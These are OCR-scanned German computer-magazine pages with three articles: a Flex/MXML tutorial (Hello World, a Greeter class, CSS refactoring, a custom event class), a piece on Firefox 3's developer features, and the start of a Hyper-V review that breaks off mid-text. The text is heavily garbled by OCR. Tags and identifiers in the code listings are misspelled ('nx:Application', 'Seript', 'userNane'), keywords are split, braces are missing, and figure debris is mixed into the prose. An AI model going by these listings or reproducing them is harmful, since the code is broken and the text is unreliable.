Flex Builder erzeugt Letzteren automa- 
tisch, das SDK stellt dazu im Ordner 
templates verschiedene HTML-Vor- 
lagen bereit. Im SDK findet der Java-na- 
he Entwickler außerdem Ant-Tasks zur 


Listing 1: "Hello World!" in MXML 


<?xnl version="1.0" encoding="utf-8"9> 
<nx:Application 
xnnsinx="http://unw.adobe. com/2006/mxnl" 
layout="absolute"> 
nx:Label id="myLabel" text="Hello World from MXNL!" /> 
<Imx:Application> 
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Flash-Clients 


Einbindung von mxmlc in automatisierte 
Build-Prozesse. 

Der erste Schritt hin zu einer etwas 
vollständigeren Applikation soll in die 
Welt der UI-Elemente von Flex führen. 
Grundsätzlich unterscheidet man hier 
zwischen Containern und Komponen- 
ten. Container sind, wie der Name ver- 
muten lässt, Klassen, die andere UI-Ele- 
mente in sich aufnehmen können - ein 
Beispiel ist die Application-Klasse, be- 
ziehungsweise ihre Manifestation als 
MXMIL-Tag <mx:Application>. Kom- 
ponenten sind in der Regel UI-Elemen- 
te zur Interaktion zwischen Bediener 
und Anwendung, Beispiele hierfür sind 
Buttons, Select-Controls oder das oben 
bereits verwendete Label. 

Ein Container definiert üblicherweise 
einen rechteckigen Bereich auf der für 
den Flash Player reservierten Zeichen- 
fläche. Container lassen sich inein- 
anderschachteln, um UI-Elemente in 
einer gewünschten Anordnung auf den 
Bildschirm zu zeichnen. Dabei ist so- 
wohl absolute als auch relative Posi- 
tionierung möglich, außerdem bietet 
Flex ein sogenanntes Constraint-Layout. 
Hierbei werden Ankerpunkte zu den 
Kanten eines Containers oder anderer 
UI-Komponenten genutzt, um UI-Ele- 
mente relativ zueinander auszurichten. 

Beim Rendering nutzt Flex einen 
Algorithmus mit drei Durchläufen. Im 
ersten, dem Commitment Pass, werden 
die Dimensions- und Positionierungs- 
angaben aller Ul-Elemente eingelesen 
und gegebenenfalls mit Standardwerten 
des Framework angereichert, sofern die 
Entwicklerin keine Angaben gemacht 
hat. Der zweite Durchlauf, der Measure- 


vw. .settings 
E org.eclipse.core.resources.prefs 
> bin-debug 
vw E htmi-template 
v & history 
"2 history.css 
history.js 
% historyFrame.htmi 
AC_OETags.js 
E index.template.html 
playerProductinstall.swf 
& libs 
vw@sr 
1} main.mxml 
=} „actionScriptProperties 
I ‚flexProperties 


BE ‚project 


Die Projektstruktur erzeugt der 
Assistent in einem Flex-Builder-3- 
Projekt automatisch (Abb. 2). 
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tom 
components 


maln.mxml Compiler/Linker 


Actionscript 
Classes 


mu Noplihatter 


a)7a 
a 
: 
2) 7 


SWE and RS files 


Use «mx » script» 
to write, import. 
orinclude 
Actionscript 


ment Pass, berechnet die tatsächliche 
und für den Augenblick absolute Größe 
und Position eines jeden Elements von 
innen nach außen und gibt sie schließ- 
lich im dritten Durchlauf, dem Layout 
Pass, von außen nach innen auf der 
Zeichenfläche des Flash Player aus. 
Das außerhalb eines Application- 
Kontexts nicht lauffähige MXML- 
Fragment in Listing 2 erweitert das 
„Hello-World“-Beispiel um ein paar 
Funktionen. Neben der Nutzung ver- 
schiedener neu eingeführter Kompo- 
nenten wie der im Gegensatz zum La- 
bel mehrzeiligen TextArea sowie des 
einzeiligen Texteingabefeldes TextIn- 
put zeigt es die Schachtelung von UI- 
Komponenten in einen UI-Container. 


Interaktion über 
Inline-Actionscript 


Darüber hinaus führt dieses Beispiel 
Interaktion mit Actionscript-Code ein. 


Web Server Client 


AM GG 
_ JR = 


RSL files 


Eine SWF-Anwendung besteht aus MXML- 
und Actionscript-Code in verschiedenen 
Kombinationen und Ausprägungen (Abb. 3). 


Die TextInput-Komponente mit der id 
userNameTxt soll den Namen des An- 
wenders abfragen und abhängig von 
der Eingabe einen angepassten „Hello- 
World“-String in der TextArea mit der 
id mainTxt ausgeben. 

Dazu dient in userNameTxt das so- 
genannte Inline-Actionscript. Im enter- 
Attribut des <mx:TextInput>-Tag wird 
das Ergebnis eines Methodenaufrufs 
myGreeter.sayHello(...) dem Inhalt 
von mainTxt zugewiesen: 


mainTxt.text = myGreeter. 7 
sayHello(userNameTxt.text); 


Beim enter- Attribut handelt es sich um 
nichts anderes als einen Event-Handler 
für das Drücken der Enter-Taste, wäh- 
rend das Texteingabefeld userNameTxt 
den Focus hat. Feuert eine Benutzer- 
aktion den enter-Event, führt das Pro- 
gramm den im Attribut angegebenen 
AS-Code aus. Für die Kompilierung 
des Codes sind jedoch noch weitere 
MXML-Zeilen erforderlich. 

Listing 3 weist dem Application-Kon- 
text einen Event-Handler für den crea- 
tionComplete-Event zu. Bei creation- 
Complete handelt es sich im Gegensatz 


<mx:HBox width="400"> 
<mx:Label text="User Name:"/> 


<Inx:HBox> 


Listing 2: Schachtelung von Ul-Komponenten 
mx:Label id="title" fontSize="24" fontStyle="bold" text="Hello World Example" /> 


<mx:Label id="subtitle" fontSize="12" text="Hello World mit Actionscript in Flex" /> 
<mx:TextArea id="mainTxt" width="400" backgroundColor="#DDDDDD" editable="false" /> 


<nx:TextInput id="userNameTxt" width="1004" enter="nainTxt.text = myGreeter.sayHello(userNameTxt.text);" /> 


nx:Seript> 
<!EEDATAL 
private var nyGreeter:Greeter = new Greeter(); 


public function initApp():void 


II says hello at the start, and asks for the user's name 
mainTxt.text = myGreeter.sayHello(); 


1» 
<Imx:Seript> 


Listing 3: Event-Handler für creationcomplete 


<mx:Application xmlnsinx="http://wuw.adobe.com/2006/mxml" xmlns="*" Layout="vertical" creationcomplete = "initApp()" > 
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Listing 4: Die Actionscript-Klasse Greeter 


Flash-Clients 


zum als Benutzerereignis klassifizierten 
enter-Event aus Listing 2 um ein Sys- 
temereignis, das das Flex-Framework 
unabhängig von einer Interaktion des 
Benutzers mit der Anwendung er- 
zeugt. Während der initialen Instanzi- 
ierung eines Ul-Elements bezeichnet 
die Publikation des creationComplete- 
Event den Zeitpunkt, zu dem die Instanz 
komplett verfügbar ist und alle Kind- 
Elemente ihren jeweiligen creationCom- 
plete-Event bekannt gegeben haben. 
Dieses Ereignis dient daher häufig als 
Einstiegspunkt in einen Pseudo-Kon- 
struktor einer MXML-Komponente, da- 
mit die Anwendung für die MXML-Da- 
tei initialen Code ausführen kann. 

Das Beispiel ruft in Actionscript die 
Funktion initApp() auf, die den Inhalt 
der TextArea auf einen Anfangswert 
setzt. Des Weiteren wird die Instanz my- 
Greeter der Actionscript-Klasse Greeter 
als private Variable der Applikation de- 
finiert und instanziiert. 

Jeglicher Actionscript-Code im Block 
innerhalb von MXML-Dateien muss in 
<mx.Script>-Tags geschachtelt werden. 
Weiter oben wurde bereits erwähnt, 
dass es sich bei MXML prinzipiell nur 


package 
{ 


p 
{ 


u 


b 


ic class Greeter 


Ir* 

* Eine Liste von Namen, die ordentlich begruesst werden sollen 

7) 

rivate static var validNanes:Array = ["Henning", "Juergen", 
"Kai"]; 


Ir* 

* Konstruktion eines String 
7) 
ublic function sayHello(userNane:String = ""):String 


var greeting:String; 
if (userNane == "") 
{ 


greeting = "Hello. Please type your user name, 
and then press the Enter key."; 


else if (validNane(userNane)) 
greeting = "Hello, " + userName + "."; 
else 
{ 
greeting = "Sorry, " + userName + ", you are not on 
the list."; 
} 
return greeting; 


Ir 
* Prueft auf Gueltigkeit eines Namens 


ai static function validNane(inputName:String = ""):Boolean 
if (validNames.indexOf(inputNane) > -1) 
return true; 
else 


return false; 
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um eine Abstraktionsschicht über Action- 
script handelt (siehe Abbildung 3). 
Letztlich entspricht jede MXML-Datei 
einer Klasse in Actionscript, die der 
MXML-Compiler mxmlc intern erzeugt. 

Die Script-Blöcke sind Teil einer 
Gruppe von Compiler-Tags in MXML, 
denen keine direkten Repräsentanten 
durch Actionscript-Klassen zugeordnet 
sind. Sie dienen der Codestrukturierung 
und mithilfe der CDATA-Elemente der 
XML-konformen Einbettung von Ac- 
tionscript-Code in MXML. 

Die Klasse Greeter beinhaltet zwei 
Methoden und ist definiert wie in Lis- 
ting 4. Greeter.as beinhaltet nun nur Ac- 
tionscript und kein MXML, daher sind 
hier weder Script-Blöcke noch CDATA- 
Elemente nötig. Die Klasse macht die 
Methode sayHello(String):String nach 
außen verfügbar; abhängig vom als Ar- 
gument übergebenen Benutzernamen er- 
zeugt die Methode einen Text für die 
Ausgabe und gibt ihn zurück. 

Actionscript 3 ist eine nach dem EC- 
MA-Script-Standard typisierte Sprache. 
Die verwendete Syntax für die Metho- 
densignatur erfordert daher einen defi- 
nierten Rückgabewert vom Typ String 
und weist dem Argument userName 
einen Default-Wert zu. Letzteres er- 
möglicht es, die Methode sayHello() 
ohne Übergabe eines Arguments user- 
Name zu nutzen und in diesem Fall 
den in der Methodensignatur definier- 
ten Default-Wert ins Innere der Metho- 
de zu übernehmen. 

Am Anfang der Klasse befindet sich 
ein package-Statement. Actionscript 
verwendet im Wesentlichen das gleiche 
Package-Konzept wie Java oder C# 
durch Abbildung der Packages auf Ord- 
nerstrukturen. In diesem Fall befindet 
sich die Klasse Greeter im Hauptord- 
ner des Projekts, daher reicht die Anga- 
be des Statement ohne einen Package- 
Pfad. In komplexeren Projekten könnte 
ein solches Statement beispielsweise 
wie folgt lauten: 


package nz.co.ventego.dataManager.admin.view; 


CSS-Dateien 
legen Attribute fest 


Schaut man sich an dieser Stelle die 
Applikationsstruktur an, ist festzustel- 
len, dass die (zugegebenermaßen sim- 
ple) Geschäftslogik in ihre eigene 
Klasse gekapselt ist, aber aufseiten der 
MXMIL-Applikation selbst auf diesem 
einfachen Level Refactoring-Bedarf 
besteht. 


Ein erstes Beispiel sind die Sryle-An- 
gaben für Schriftgrößen und Farben im 
MXML-Code. Analog zur Spezifikation 
von Actionscript-Code in Tag-Attribu- 
ten nennt man diese Art der Style-Dekla- 
ration Inline-CSS. Bei der Verwendung 
dieser Syntax wird das Sryle-Attribut auf 
die Instanz eines UI-Elements angewen- 
det, bei der sie spezifiziert wurde. Lis- 
ting 2 weist die Style-Angaben font- 
Size= 24“ sowie fontStyle=“bold“ der 
Label-Instanz mit der id title zu. 

In kleinen und hinsichtlich der Code- 
menge überschaubaren Benutzerschnitt- 
stellen mag dieser Ansatz schnelle Erfol- 
ge bringen, allerdings leiden offenkundig 
Wartbarkeit und Wiederverwendbarkeit 
von Styles. Besser ist die Deklaration 
von Styles daher in CSS-Notation, wo- 
bei diese entweder geschachtelt in ei- 
nem <mx:Style>-Block innerhalb eines 
MXML-Dokuments gespeichert wer- 
den können oder in einer beziehungs- 
weise mehreren externen CSS-Dateien 
ausgelagert sind. Letzteres ist die be- 
vorzugte Vorgehensweise, und da Flex- 
Styles sowohl Typ- als auch Klassen- 
selektoren unterstützt, findet man in 
größeren Projekten oft eine weitere Un- 
terteilung der gesamten CSS-Bibliothek 
in mehrere Dateien. 

Für das Refactoring des Beispiel- 
programms werden folgende CSS-De- 
klarationen in eine externe Datei auf- 
genommen: 


‚title 


font-size: 24px; 
font-style: bold; 


„subtitle 
font-size: 12px; 
TextArea 


{ 
backgroundColor: #DDDDDD; 


Bei den ersten beiden handelt es sich 
um Klassenselektoren, die einer Instanz 
eines UI-Elements in MXML mithilfe 
des Attributs styleName zugewiesen 
werden müssen: 


<mx:Label id="title" styleName="title" 
text="Hello World Example" /> 


Die dritte Deklaration ist ein Typselek- 
tor und wirkt als solcher global für alle 
Instanzen der Klasse beziehungsweise 
des MXML-Tag TextArea. Trotz dieser 
globalen Definition könnten nun einzel- 
ne Instanzen der Klasse TextArea diesen 
Style für die Hintergrundfarbe noch 
durch die Angabe eines background- 
Color-Tag-Attributs überschreiben, da 
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lokale Stilangaben in der spezifischen 
Instanz immer Vorrang vor Typselekto- 
ren haben. 

Eine Bemerkung wert ist zudem die 
Notation der Style-Attribute. In MXML- 
Tags muss der Entwickler hier eine 
CamelCasing-Notation verwenden (das 
heißt, das erste Zeichen eines Be- 
zeichners wird grundsätzlich klein ge- 
schrieben, danach werden Groß- und 
Kleinschreibung gemischt verwendet), 
wohingegen er in externen CSS-Da- 
teien auch die in der CSS-Welt übliche 
Notation mit Bindestrichen verwenden 
darf. Die Begründung ist hier techni- 
scher Art, da die Kompilierungsprozes- 
se für Inline-Styles sich von denen für 
externe unterscheiden und die Style-At- 
tribute in MXML-Tags als Eigenschaf- 
ten der Objektinstanz implementiert 
sind; diese dürfen in MXML keine 
Sonderzeichen enthalten. 

Eine einfache Anweisung bindet die 
externe CSS-Datei ein: 


<mx:Style source="assets/styles/app3.css” /> 


Ein weiterer Refactoring-Schritt soll 
die Verlagerung der UI-Elemente in ei- 
ne View-Komponente sein. Das hört 
sich zunächst trivial an, birgt jedoch ei- 
nige Stolperfallen. Die View-Kompo- 
nente als solche ist relativ einfach zu 
erzeugen. Eine MXML-Komponente 
unterscheidet sich von einer MXML- 
Applikation im Wesentlichen durch 
ein Wurzelelement, das nicht <mx:Ap- 
plication> ist, sondern in den meisten 
Fällen ein anderer UI-Container — im 
vorliegenden Fall eine vertikale Box 
(VBox). 

Das Einbinden der View-Komponen- 
te erfolgt in der Hauptanwendung durch 


<view:UserInterface id="appUl" 

text=" (displayText}" 

userNameEntered="userNameEnteredHandler 7 
(event]" /> 


Die neue Eigenschaft text und der 
neue Event userNameEntered dienen 
dazu, die View-Komponente lose an 
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die Anwendung und ihre Geschäftslogik 
zu koppeln. Die geschweiften Klam- 
mern um die Variable displayText be- 
schreiben ein sogenanntes Binding in 
Flex. Das bedeutet nichts anderes, als 
dass jede Änderung am Inhalt der Varia- 
blen displayText unmittelbar in das text- 
Attribut der Komponente <view.User- 
Interface> übernommen wird. 

In UserInterface wird wiederum ein 
Binding genutzt, um den Inhalt des 
text-Attributs in die TextArea zu über- 
nehmen: 


<mx:TextArea id="mainTxt" width="400" 7 
editable="false" text="{text}" /> 


Die View-Komponente soll möglichst 
kein Wissen über die Geschäftslogik 
enthalten. Daher greift der enter-Event- 
Handler der TextInput-Komponente 
nicht mehr direkt auf die Greeter-Klas- 
se zu, sondern stößt eine lokale Me- 
thode enterHandler() an. Diese Me- 
thode erzeugt eine Instanz einer von 
flash.events.Event abgeleiteten Event- 
Klasse, die in der Lage ist, einen String 
als Information zwischen UI-Elemen- 
ten der Anwendung zu transportieren. 
Nach der Erzeugung des Event-Objekts 
wird es mithilfe des Compiler-Tag 
<mx:MetaData> Flex bekannt gemacht. 
Flex nimmt das neue Event-Objekt in 
die Event-Schlange auf und liefert es an 
die Flex-Runtime aus. <view:UserInter- 
Jace> ist nun als Event-Dispatcher von 
userNameEntered bekannt, und von 
dieser Tatsache wird im Aufruf der 
Komponente aus der Hauptanwendung 
heraus wie oben erläutert Gebrauch 
gemacht. 

Die nötigen Schritte zur Erstellung 
einer eigenen Event-Klasse sind im We- 
sentlichen das korrekte Ableiten, die De- 
finition der Eigenschaften zum Transport 
der Daten sowie das Überschreiben der 
clone()-Methode (Listing 5). Nach die- 
sem letzten Refactoring-Schritt liegt ei- 
ne simple Anwendung vor, die auf ex- 
ternen Style-Informationen basiert und 
von der Hauptanwendung losgelöste 


vwW@src 
vB asseıs 
vi styles 
"= app3.css 
ven 
vo 
v (> ventegocreative 
vw & ixdemo 
w & business 
“T} Greeter.as 
vB event 
7) UserNameEvent.as 
vo view 
he: | UserInterface.mxml 
2a appl.mxmi 
| app2.mxmi 
2 app3.mxmi 
2 app4.mxmi 


Der finale Aufbau der Klassenstruktur 
integriert view-, events- und business- 
Packages (Abb. 4). 


Listing 5: Die Event-Klasse UserNameEvenf 
package nz.co.ventegocreative.ixdemo. events 
inport flash.events. Event; 
public class UserNameEvent extends Event 
public var userName:String; 
public function UserNameEvent(type:String, 


userNane:$tring) 
{ 


super(type) 
this.userName = userNane; 


override public function clone():Event 
{ 


return new UserNameEvent(type, userNane); 


View-Elemente und Geschäftslogik hat. 
Die beiden Letzteren kommunizieren 
nur über die Hauptanwendung mitein- 
ander; damit übernimmt diese die Rolle 
des Controller. Gleichzeitig wurden die 
verschiedenen Klassen in eine realisti- 
sche Paketstruktur überführt (siehe Ab- 
bildung 4). 

Weitere Schritte könnten nun das 
Hinzufügen eines clientseitigen Daten- 
modells sein beziehungsweise die An- 
wendung eines vollständigen MVC- 
Framework wie Cairngorm [g] oder 
PureMVC [h]. Auf die Kommunikation 
mit Server-Anwendungen ist der Arti- 
kel nicht eingegangen und visuelle An- 
passungen der Flex-Anwendung mit 
Styles hat er nur rudimentär gestreift. 
Dies wird unter anderem Thema eines 
späteren Artikels sein. (ka) 
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Browser 


Firefox 3: Neues für Webentwickler 
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Microsat IS 


Knapp zwei Jahre nach dem letzten Versionssprung haben die 
Entwickler des freien Firefox die dritte Ausgabe ihres Browsers 
veröffentlicht. Neben vielen Neuerungen für Anwender bringt 


er Verbesserungen für Entwickler. 


as sich an der Oberfläche des 
neuen Firefox getan hat, ist 
schnell zu erkennen: Bei der 


automatischen Vervollständigung in 
der Adresszeile (‚location bar“, s. Auf- 
macher) erscheinen neben passenden 
URLs die Titelzeilen der Webseiten 
und ihre Icons - allerdings auch von 
noch nicht besuchten Seiten. Da dies 
vielen Anwendern nicht gefiel, stellen 
die Entwickler eine Anleitung zum Ab- 
schalten dieser „reichhaltigen“ Darstel- 
lung bereit (s. iX-Link). Ein Klick auf 
das „Favicon“ in der Adresszeile zeigt 
bei HTTPS-Verbindungen sofort, wel- 
che Website hinter der URL steckt — 
das soll Phishern die Arbeit erschwe- 
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ren. Die „Wollen Sie das Passwort 
speichern“-Frage stellt Firefox jetzt erst 
nach der erfolgreichen Anmeldung, 
nicht schon nach der Eingabe des Pass- 
worts wie bisher. Das verhindert unnö- 
tige Fehleinträge. Downloads gestalten 
sich einfacher, da der Browser sowohl 
den Speicherort als auch die Herkunft 


© CSS-Implementierung 
© Verbesserungen beim GUI 
© Anfänge von HTMLS-Unterstützung 


der heruntergeladenen Dateien zeigt. 
Außerdem lassen sich unterbrochene 
Downloads später fortsetzen. 

Wichtige Neuerungen gab es jedoch 
auch im Unterbau. Sie betreffen Web- 
entwickler, die sich auf bessere CSS- 
Unterstützung, neue Javascript-Funktio- 
nen, mehr Nähe zum Internet Explorer 
und HTMLS-Features stürzen können. 
Und wie die Anwender dürften sie 
sich über den Tempogewinn freuen: 
Im Kurztest benötigte Firefox 3 zum 
Laden einer lokal gespeicherten Web- 
seite rund 10 % weniger Zeit als sein 
Vorgänger. 


Verbesserungen bei 
Stylesheets 


Die größten Auswirkungen dürften die 
Neuerungen in Firefox’ CSS-Umset- 
zung haben. Dazu gehört Verständnis 
für die display-Werte inline-block und 
inline-table. Das erste kennen andere 
Browser schon lange, sogar der Inter- 
net Explorer. Die auf den ersten Blick 
widersprüchliche Bezeichnung legt fest, 
dass der Browser das betreffende Ele- 
ment innerhalb der aktuellen Zeile an- 
ordnet, es darf jedoch Block-Elemente 
enthalten. Außerdem kann man ihm 
wie Block-Elementen eine Breite zu- 
weisen. Damit lassen sich mit inline- 
block ähnliche Anordnungen erreichen 
wie mit float, ohne jedoch dessen 
Nachteile in Kauf zu nehmen (s. Lis- 
ting 1 und Abb. 1). 

Die in CSS 2.0 definierte, aus 2.1 je- 
doch wieder entfernte Eigenschaft font- 
size-adjust, die der Entwurf von CSS3 
auch enthält, interpretiert der Browser 
korrekt. Damit können Entwickler die 
Schriftgröße anhand der Höhe von 
Kleinbuchstaben festlegen. Ebenfalls 
bei der Darstellung von Texten hilft das 
„weiche“ Trennungszeichen &shy;, das 
mögliche Umbrüche markiert. Firefox 3 
fügt bei Bedarf an dieser Stelle einen 
Trennstrich ein und führt das Wort auf 
der nächste Zeile weiter (s. Listing 2 
und Abb. 2). 

In ihrer DOM-Implementierung ha- 
ben die Firefox-Entwickler einige 
Funktionen nachgerüstet, die es bis- 
lang nur im Internet Explorer gab. In 
Zeiten des Web 2.0 besonders wichtig 
dürften die Ereignisse oncut, oncopy 
und onpaste sein. Damit lassen sich 
jetzt alle Änderungen an Textfeldern 
verarbeiten. Bislang war das Einfügen 
aus dem Clipboard in Firefox und sei- 
nen Abkömmlingen nur durch Überwa- 
chung von onblur möglich. Das schi- 
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Browser 


cken die Browser jedoch nur, wenn das 
Eingabefeld den Fokus verliert, und 
dann ist es für viele Anwendungen 
schon zu spät. 

Mit den neu eingeführten Methoden 
getBoundingClientRect() und getClient 
Rects() können Anwendungen die Ab- 
messungen von DOM-Elementen und 
aller ihrer Kinder ermitteln. Beide stam- 
men aus dem Internet Explorer, ebenso 
wie clientTop() und clientLeft(), die die 
Breite des oberen und linken Rahmens 
liefern. 


HTML 5-Funktionen 
und -Events 


Falls bisher der Eindruck entstanden 
sein sollte, Firefox 3 laufe lediglich dem 
Internet Explorer hinterher, ist es Zeit 
für eine Korrektur. Etliche seiner Neue- 
rungen gibt es bislang nur als Vorschlag 
für das zukünftige HTML 5. Dazu gehö- 
ren etwa getElementsByClassName(), 
das eine Kollektion der DOM-Elemente 
zurückliefert, deren class-Attribut den 
angegebenen Wert hat. Ähnlich wie das 
ältere getElementsByTagName() kann es 
mit der Suche bei einem beliebigen Ele- 
ment beginnen. Ebenfalls aus HTMLS5, 
genauer aus den Überlegungen der 
Whatwg-Gruppe, sind die Drag- und 
Drop-Events entlehnt. Auf den Mozil- 
la-Seiten findet sich ein Beispiel für ih- 
re Nutzung (Ss. iX-Link). Bislang sind 
diese Events jedoch eng an Mozilla-Be- 
sonderheiten gebunden, so lassen sie 
sich nur in Verbindung mit einem von 
diesem bereitgestellten Drag-Service 
verwenden. 

Solange nicht alle Browser gleich- 
ermaßen damit umgehen können (von 
einer Normierung ganz zu schweigen), 
ist der Nutzen solcher Erweiterungen 
aber beschränkt: Wenn sich die Nutzer 
auf die Verwendung eines bestimmten 
Browsers festlegen lassen, kann man 
Spezifisches erfolgreich einsetzen. An- 
dernfalls nützt die Arbeit im besten Fall 
nichts — im schlimmsten schadet sie, 
wenn der gerade eingesetzte Browser 
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Firefox 3 (oben) interpretiert anders 
als sein Vorgänger den Wert inline- 
block der display-Eigenschaft korrekt. 
Bei der Gelegenheit lässt er jedoch 
die Bullets verschwinden (Abb. 1). 


Meistbesuchte Seit... Erste 


Z Disable » & Cookies = | 


Dosaiufchit- 
fahrtskapitänswitwenun- 
terstützungskasse 


die Daten falsch interpretiert oder gar 
abstürzt. 

Ebenso browserspezifisch ist die Um- 
setzung von Microformats. Diese Zu- 
sammenfassungen von (X)HTMIL-Ele- 
menten definieren Adressen, Termine 
und Ähnliches so, dass sie sich leicht 
weiterverarbeiten lassen. Das Operator- 
Plug-in (s. iX-Link) illustriert einige Ein- 
satzmöglichkeiten, etwa den Export von 
Kontakt- und Termindaten in die jeweili- 
gen Google- oder Yahoo-Anwendungen. 
Firefox stellt eine Microformats-API be- 
reit, die ein Programm jedoch ausdrück- 
lich aktivieren muss. Anschließend kann 


Protokoll löschen 
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Ältere Firefoxe (links) interpretieren das disabled-Attribut zaghafter als 
Version 3 (Mitte). Vom unter Mac OS X Üblichen (rechts) ist auch sie noch weit 


entfernt (Abb. 3). 
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Listing 1: 
Menüs mit float und inline-block 


Aloatı left; 
width: 5.5en; 
background-color: Haaffaa; 


„neu { 
width: 5.5en; 
display: inline-block; 
background-color: #ffaaaa; 


s/style 
<body> 
<ul> 
<li elass="old">Datei 
<li elass="old">Bearbeiten 
<li elass="old">Optionen 
«lub 
<br> 
<ul> 
<li elass="new">Datei 
<li elass="new">Bearbeiten 
sli class="new">Optionen 
«lub 
</body> 
</htnl> 


Listing 2: Trennmöglichkeiten 
<html> <style> 
pt 
width: 10en; 
} 


s/style 
<body> 
<p>Donaußshy;dampfäshy;schiffäshy;fahrtsäshy; 
kapitäns&shy;witäshy;wen&shy;un&shy;teräshy; 
stüt&shy;zungsäshy;kasse 
<Ip> 
hans </html» 


Mit der HTML-Entity &shy; markieren 
Webautoren Trennmöglichkeiten 
(Abb. 2). 


es sowohl auf Microformats auf der 
Webseite zugreifen als auch mit add() 
neue spezifizieren. Vordefiniert sind un- 
ter anderem adr, hCard (Kontaktdaten) 
und hCalendar (Termin). 

Einige andere Kleinigkeiten dürften 
Entwickler wie Anwender erfreuen. 
So passt sich der Firefox auf Apple- 
Rechnern endlich in deren Aqua-De- 
sign ein. Per disabled-Attribut deakti- 
vierte Knöpfe lassen sich in der neuen 
Version besser erkennen als bislang, 
sie unterscheiden sich aber immer 
noch von dem, was auf der Plattform 
üblich ist (s. Abb. 3). Eine als Schutz 
der Privatsphäre eingeführte Änderung 
schließlich könnte den einen oder an- 
deren Programmierer stören: Beim 
Hochladen von Dateien übermittelt der 
Browser nicht mehr den gesamten 
Pfad, sondern nur noch den eigent- 
lichen Namen. In SVG-Daten (Scalable 
Vector Graphics) interpretiert Firefox 


jetzt foreignObject, pattern und mask 


ebenso korrekt wie alle Filter. 
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Microsofts Virtualisierer Hyper-V 


Halbrund 


Fred Hantelmann 


Mit Hyper-V hat Microsoft einen neuen Virtualisierer fertig- 
gestellt, der VMware und Xen Konkurrenz machen soll. Doch 


vorher haben die Entwickler einige der geplanten Funktionen 
für das Windows Server 2008 Add-on über Bord geschmissen. 


it „Konkurrenz für VMware 
und Xen“ betiteln Blogs und 
Online-Gazetten ihre ersten Be- 


richte über Microsofts finale Release 
seiner Virtualisierungsschicht Hyper-V. 
Deren Fertigstellung verkündete der 
Hersteller am 26. Juni dieses Jahres - 
fast sechs Wochen vor dem geplanten 
Termin. Dabei haben die Redmonder ih- 
re ursprünglichen Ziele bereits im Mai 
letzten Jahres relativiert und zahlreiche 
Features aus ihrem ursprünglich Viridi- 
an getauften Projekt gestrichen: Live- 
Migration und Hotplug-Hardware zäh- 
len nicht mehr zum Umfang. 
Dynamische Partitionierung lautet 
das Konzept von Hyper-V, dessen Final 
Release seit 14. Juli als Update für den 
Windows Server 2008 (KB950050-x64) 
zum freien Download bereitsteht. Den 
Kern bildet ein gut 100 KByte großer 
Hypervisor, der die Verbindung zur 
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Hardware übernimmt. Er ist für den 
Auf- und Abbau von Partitionen zustän- 
dig und steuert außerdem den Zugriff 
auf CPU, Speicher und Geräte. Ober- 
halb des Hypervisor arbeitet eine Root- 
Partition, die über einen Virtualization- 
Stack ähnlich einer privilegierten 
Xen-Domö alleinigen Zugriff auf den 
Hypervisor hat. iX hat das Produkt auf 
Intels All-in-one-Board mit Q35-Chip- 
set, e6750-CPU (Core 2 Duo mit 2,67 
GHz) und 8 GByte RAM getestet. 
Etwa 31 MByte groß ist der Patch, 
der alle Komponenten von Hyper-V 
bündelt. Voraussetzung: die 64-Bit- 
Version des Windows Server 2008 und 
eine x86_64-CPU von Intel oder AMD 
mit aktivierten VT-Extensions. Nach 
dem Update muss der Administrator 
die Serverrolle „Hyper-V“ im Server- 
manager unter den Verwaltungs-Tools 
aktivieren. Dadurch richtet Windows 


die Hyper-V-Tools automatisch ein. 
Ein Neustart des Rechners ist ebenfalls 
erforderlich, da das Betriebssystem den 
Hypervisor als zusätzliches Gerät laden 
muss — anderenfalls funktioniert der 
Virtualisierer nicht. 

Ersten Kontakt mit dem nun zugäng- 
lichen Hyper-V-Manager nimmt der 
Administrator über den gleichlautenden 
Eintrag des Startmenüs auf. Die An- 
wendung verbindet ihn mit einem an- 
zugebenden Windows Server 2008, der 
entweder lokal oder in der Ferne laufen 
darf. Ein einzelner Hyper-V-Manager 
handhabt auch mehrere Systeme. 


Alles auf einmal 


Der Hyper-V-Manager präsentiert drei 
Spalten, von denen die linke die verbun- 
denen Hyper-V-Root-Partitionen listet, 
mittig die vorhandenen Client-Partitio- 
nen zum gewählten Hyper-V nebst ak- 
tuellem CPU-Verbrauch samt Betriebs- 
zeit stehen und rechts die zulässigen 
Aktionen aufgeführt sind. Das wirkt 
auf den ersten Blick etwas überladen: 
Der mittlere Block zeigt unterhalb der 
Client-Liste noch die verfügbaren Snap- 
shots zum angewählten Client und dar- 
unter seinen Zustand nebst ikonisiertem 
Bildschirminhalt; die Aktionsliste rechts 
ist unterteilt in Hyper-V- und clientspe- 
zifische Aktionen. Nach kurzer Einge- 
wöhnung erwies sich die Bedienung 
aber als intuitiv und komfortabel. 

Das Einrichten von neuen Gästen 
respektive Clients — so die Terminolo- 
gie von Hyper-V - unterstützt ein Wi- 
zard. Er fragt nach Namen des Gasts, 
seiner Speicherausstattung, ob er eine 
Netzwerkkarte erhalten soll und nach 
der Größe seiner virtuellen Festplatte. 
Abschließende Optionen lassen den Ad- 
ministrator noch entscheiden, welches 
Boot-Medium der Client verwenden 
und ob er nach der Fertigstellung sofort 
starten soll. Unterstützte Boot-Medien 
sind CD/DVD, ISO-Datei, Floppy, 
Floppy-Images mit .vfd-Kennung und 
im Netz befindliche Images per PXE- 
Boot. Falls der Client sofort hochfährt, 
muss man zusätzlich aus dem Hyper-V- 
Manager heraus eine Verbindung zum 
Client aktivieren, was das Darstellen 
seiner virtuellen Grafikkarte in einem 
eigenen Fenster zur Folge hat. 

Abgesehen davon, dass der Wizard 
zum Grundaufbau einer neuen virtuellen 
Maschine unumgänglich ist, erzeugt er 
nur eine Untermenge der für Hyper-V 
unterstützten Hardwareausstattungen. 
Festplatten sind dynamische (Sparse-) 
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Dateien, verbunden mit IDE 0. Fordert 
der Client nach der Erstinstallation mehr 
Plattenplatz, ist eine fragmentierte vir- 
tuelle Harddisk auf „lebendigen“ Root- 
Partitionen obligatorisch. Alternativ 
kann der Administrator eine Datei fester 
Größe einstellen oder dem Client eine 
physische Festplatte zuordnen. Beides 
gelingt über das Einstellungs-Menü zum 
Client, aber nur dann, wenn er nicht 
aktiv ist. Wer mit Plattenplatz haus- 
halten muss, kann virtuelle Harddisks 
auch komprimiert vorhalten. 

Die Hardware, die Hyper-V seinen 
Gästen vorgaukelt, sollte keinen Client 
überfordern: Als CPU-Typ nimmt Hy- 
per-V den realen, der Chip des virtu- 
ellen Motherboards zeigt sich als 
440BX/ZX/DX, Host- und ISA-Bridge 
sowie IDE-Controller entsprechen ei- 
nem Intel 82371AB/EB/MB (PIIX4). 
